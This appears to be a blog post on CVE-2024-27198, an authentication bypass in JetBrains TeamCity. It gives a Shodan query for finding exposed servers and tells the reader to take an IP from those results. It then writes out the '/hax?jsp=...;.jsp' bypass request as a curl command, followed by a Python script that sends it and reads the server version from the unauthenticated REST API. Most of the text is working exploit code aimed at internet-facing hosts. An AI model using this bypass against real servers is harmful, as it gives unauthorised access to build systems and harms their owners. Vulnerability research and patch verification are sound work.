CVE-2024-27198 || TeamCity
Mar 10, 2024
CVE-2024-27198 is an authentication bypass vulnerability in the web component of JetBrains TeamCity (On-Premises versions before 2023.11.4). It arises from an alternative path issue (CWE-288): a request to a non-existent path that carries a jsp parameter and ends in ";.jsp" is routed to the JSP handler, so the authenticated REST API can be reached without credentials. It has a CVSS base score of 9.8 (Critical).
A Shodan search on TeamCity reveals around 2230 instances exposed to the internet.
Shodan Query: http.component:"teamcity"
Let's see how to find the version of a TeamCity server:
1. Take an IP address from the Shodan query above.
2. Append the following string to the IP address (and port): /hax?jsp=/app/rest/server;.jsp
Example: http://10.10.20.30:8111/hax?jsp=/app/rest/server;.jsp
3. Now we can use curl to make the above request. The URL must be quoted, because an unquoted ";" is a command separator in the shell and the request would be sent without the ";.jsp" suffix that triggers the bypass:
curl -ik 'http://10.10.20.30:8111/hax?jsp=/app/rest/server;.jsp'
4. If the response code is 403, the server refused the unauthenticated request, which means it is most likely patched (or not vulnerable for another reason). If the bypass works, the server answers 200 with the XML of the /app/rest/server endpoint, and the version attribute of the <server> element (for example version="2023.11.3 (build 147512)") identifies the TeamCity server version.
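The four steps above carried through in one script, as an added example that is not code from the original post: it builds the bypass URL, sends the request, and classifies the response the way step 4 describes. The helper names, the host 10.10.20.30 and the two sample responses are assumptions constructed for illustration, not captured from a real server.

```python
"""Probe a TeamCity host for CVE-2024-27198 via the /hax?jsp=...;.jsp path.

Added example, not from the original post. Only the version-disclosure
check described in the post is implemented; nothing else is requested.
"""
import sys
import urllib.error
import urllib.request
import xml.etree.ElementTree as ET

# Path from the post: a 404 route plus a jsp parameter ending in ";.jsp".
BYPASS_PATH = "/hax?jsp=/app/rest/server;.jsp"


def bypass_url(base):
    """Build the probe URL from a base such as http://10.10.20.30:8111."""
    return base.rstrip("/") + BYPASS_PATH


def classify(status, body):
    """Map (HTTP status, body) to (verdict, version).

    verdict is 'rejected'   for a 403 (server refused the unauthenticated call),
               'vulnerable' for a 200 carrying <server version="..."> XML,
               'unexpected' for anything else (not TeamCity, login page, ...).
    """
    if status == 403:
        return ("rejected", None)
    if status == 200:
        try:
            root = ET.fromstring(body)
        except ET.ParseError:
            return ("unexpected", None)
        if root.tag == "server" and "version" in root.attrib:
            return ("vulnerable", root.attrib["version"])
    return ("unexpected", None)


def probe(base, timeout=10):
    """Send the probe (network call) and classify the answer.

    urllib raises HTTPError for 4xx/5xx, so the error branch still feeds the
    status and body into classify() instead of dropping them.
    """
    req = urllib.request.Request(bypass_url(base))
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return classify(resp.status, resp.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as err:
        return classify(err.code, err.read().decode("utf-8", "replace"))


# Constructed sample responses (assumptions, not real captures) so the
# classifier can be exercised offline.
SAMPLE_VULNERABLE = (
    200,
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<server version="2023.11.3 (build 147512)" versionMajor="2023" '
    'versionMinor="11" buildNumber="147512" '
    'webUrl="http://10.10.20.30:8111"/>',
)
SAMPLE_REJECTED = (403, "<html><body>Access denied</body></html>")


if __name__ == "__main__":
    # With a base URL argument the script probes a live host; without one it
    # only shows the classifier on the constructed samples.
    if len(sys.argv) > 1:
        print(bypass_url(sys.argv[1]), probe(sys.argv[1]))
    else:
        for sample in (SAMPLE_VULNERABLE, SAMPLE_REJECTED):
            print(sample[0], classify(*sample))
```

Run it as `python3 probe.py http://10.10.20.30:8111` against a host you are authorised to test; a 'vulnerable' verdict with a version string is the same information step 4 reads out of the curl output, and a 302 redirect to the login page is followed by urllib and lands in 'unexpected', which is the correct result for a host that is not exposing the REST endpoint.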